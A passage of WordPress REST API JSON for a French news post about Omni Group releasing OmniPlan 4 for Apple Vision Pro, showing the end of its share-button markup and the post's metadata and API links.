padding-top:10px;\" class=\"hupso-share-buttons\"><!-- Hupso Share Buttons - http:\/\/www.hupso.com\/share\/ --><a class=\"hupso_counters\" href=\"http:\/\/www.hupso.com\/share\/\"><img src=\"https:\/\/static.hupso.com\/share\/buttons\/lang\/fr\/share-small.png\" style=\"border:0px; padding-top:2px; float:left;\" alt=\"Share Button\"\/><\/a><script type=\"text\/javascript\">var hupso_services_c=new Array(\"twitter\",\"facebook_like\",\"google\",\"pinterest\",\"email\",\"linkedin\");var hupso_counters_lang = \"fr_FR\";var hupso_image_folder_url = \"\";var hupso_url_c=\"\";var hupso_title_c=\"Omni Group Lance OmniPlan 4 pour Apple Vision Pro, Pionnier dans la Productivit\u00e9 sur Vision Mixed Reality\";<\/script><script type=\"text\/javascript\" src=\"https:\/\/static.hupso.com\/share\/js\/counters.js\"><\/script><!-- Hupso Share Buttons --><\/div>","protected":false},"author":1,"featured_media":14884,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2242],"tags":[],"class_list":["post-14883","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-divers"],"_links":{"self":[{"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/posts\/14883"}],"collection":[{"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/comments?post=14883"}],"version-history":[{"count":0,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/posts\/14883\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/media\/14884"}],"wp:attachment":[{"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/media?parent=14883"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/categories?post=14883"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/tags?post=14883"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}